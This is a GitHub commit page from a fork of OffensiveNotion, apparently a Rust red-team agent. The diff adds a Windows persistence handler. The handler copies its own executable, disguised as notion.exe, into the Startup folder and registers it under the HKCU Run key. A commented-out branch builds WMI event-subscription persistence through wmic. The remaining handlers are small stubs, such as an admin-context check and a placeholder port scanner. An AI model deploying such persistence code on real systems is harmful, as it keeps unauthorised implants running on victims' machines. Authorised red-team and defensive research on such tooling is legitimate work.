forked from mttaggart/OffensiveNotion
-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
16 changed files
with
190 additions
and
599 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| use std::error::Error; | ||
|
|
||
| pub async fn handle() -> Result<String, Box<dyn Error>> { | ||
| // TODO: Implement Linux check | ||
| #[cfg(windows)] { | ||
| let is_admin = is_elevated::is_elevated(); | ||
| println!("{}", is_admin); | ||
| Ok(String::from(format!("Admin Context: {is_admin}").to_string())) | ||
| } | ||
| #[cfg(not(windows))] { | ||
| Ok(String::from(format!("Under Construction!").to_string())) | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,94 @@ | ||
| use std::error::Error; | ||
| use std::path::Path; | ||
| #[cfg(windows)] use winreg::{RegKey}; | ||
| #[cfg(windows)] use winreg::enums::HKEY_CURRENT_USER; | ||
|
|
||
|
|
||
| pub async fn handle(s: &String) -> Result<String, Box<dyn Error>> { | ||
| // `persist [method] [args]` | ||
| #[cfg(windows)] { | ||
| match s.trim() { | ||
| "startup" => { | ||
| // Get user | ||
| if let Ok(v) = var("APPDATA") { | ||
| let mut persist_path: String = v; | ||
| persist_path.push_str(r"\Microsoft\Windows\Start Menu\Programs\Startup\notion.exe"); | ||
| let exe_path = args().nth(0).unwrap(); | ||
| println!("{exe_path}"); | ||
| // let mut out_file = File::create(path).expect("Failed to create file"); | ||
| match fs_copy(&exe_path, &persist_path) { | ||
| Ok(b) => { return Ok(format!("{b} bytes written to {persist_path}").to_string());}, | ||
| Err(e) => { return Ok(e.to_string())} | ||
| } | ||
| } else { | ||
| return Ok("Couldn't get APPDATA location".to_string()); | ||
| }; | ||
| }, | ||
| "registry" => { | ||
| if let Ok(v) = var("LOCALAPPDATA") { | ||
| let mut persist_path: String = v; | ||
| persist_path.push_str(r"\notion.exe"); | ||
| let exe_path = args().nth(0).unwrap(); | ||
| println!("{exe_path}"); | ||
| // let mut out_file = File::create(path).expect("Failed to create file"); | ||
| fs_copy(&exe_path, &persist_path)?; | ||
| let hkcu = RegKey::predef(HKEY_CURRENT_USER); | ||
| let path = Path::new(r"Software\Microsoft\Windows\CurrentVersion\Run"); | ||
| let (key, disp) = hkcu.create_subkey(&path)?; | ||
| match disp { | ||
| REG_CREATED_NEW_KEY => println!("A new key has been created"), | ||
| REG_OPENED_EXISTING_KEY => println!("An existing key has been opened"), | ||
| }; | ||
| key.set_value("Notion", &persist_path)?; | ||
| Ok("Persistence accomplished".to_string()) | ||
| } else { | ||
| Ok("LOCALDATA undefined".to_string()) | ||
| } | ||
| }, | ||
| "wmic" => { | ||
| //Ref: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/ | ||
| //With special thanks to: https://github.com/trickster0/OffensiveRust | ||
| //OPSEC unsafe! Use with caution | ||
| // under construction | ||
| /* | ||
| if let Ok(v) = var("LOCALAPPDATA") { | ||
| let mut persist_path: String = v; | ||
| persist_path.push_str(r"\notion.exe"); | ||
| let exe_path = args().nth(0).unwrap(); | ||
| println!("{exe_path}"); | ||
| // let mut out_file = File::create(path).expect("Failed to create file"); | ||
| fs_copy(&exe_path, &persist_path)?; | ||
| // I basically hate this, but... | ||
| let args1 = r##"/c wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="Notion", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"##; | ||
| let args2 = format!(r##"/c wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="Notion", ExecutablePath="{persist_path}",CommandLineTemplate="{persist_path}"##); | ||
| let args3 = r##"/c wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"Notion\"", Consumer="CommandLineEventConsumer.Name=\"Notion\"""##; | ||
| let cmd1 = { Command::new("cmd") | ||
| .args([args1]) | ||
| .output() | ||
| .expect("failed to execute process"); | ||
| }; | ||
| let cmd2 = { Command::new("cmd") | ||
| .args([args2]) | ||
| .output() | ||
| .expect("failed to execute process"); | ||
| }; | ||
| let cmd3 = { Command::new("cmd") | ||
| .args([args3]) | ||
| .output() | ||
| .expect("failed to execute process") | ||
| }; | ||
| */ | ||
| Ok("Under Construction".to_string()) | ||
|
|
||
| }, | ||
| _ => Ok("That's not a persistence method!".to_string()) | ||
| } | ||
| } | ||
| #[cfg(not(windows))] { | ||
| Ok("Not implemented yet!".to_string()) | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,7 +1,7 @@ | ||
| // Ref: https://github.com/skerkour/kerkour.com/tree/main/2021/rust_fast_port_scanner | ||
| // TODO | ||
| use std::error::Error; | ||
|
|
||
| pub fn portscan() -> bool{ | ||
| println!("Scanning!"); | ||
| return true; | ||
| pub async fn handle(s: &String) -> Result<String, Box<dyn Error>> { | ||
| // Ref: https://github.com/skerkour/kerkour.com/tree/main/2021/rust_fast_port_scanner | ||
| // TODO | ||
| Ok("Not implemented yet!".to_string()) | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,11 @@ | ||
| use std::error::Error; | ||
|
|
||
| pub async fn handle(s: &String) -> Result<String, Box<dyn Error>> { | ||
| // TODO: Implement | ||
| #[cfg(windows)] { | ||
| return Ok(String::from("Under Construction!")) | ||
| } | ||
| #[cfg(not(windows))] { | ||
| return Ok(String::from("Runas only works on Windows!")) | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,5 @@ | ||
| use std::error::Error; | ||
|
|
||
| pub async fn handle() -> Result<String, Box<dyn Error>> { | ||
| Ok("Shutting down".to_string()) | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,5 @@ | ||
| use std::error::Error; | ||
|
|
||
| pub async fn handle() -> Result<String, Box<dyn Error>> { | ||
| Ok("Unknown command type".to_string()) | ||
| } |
Oops, something went wrong.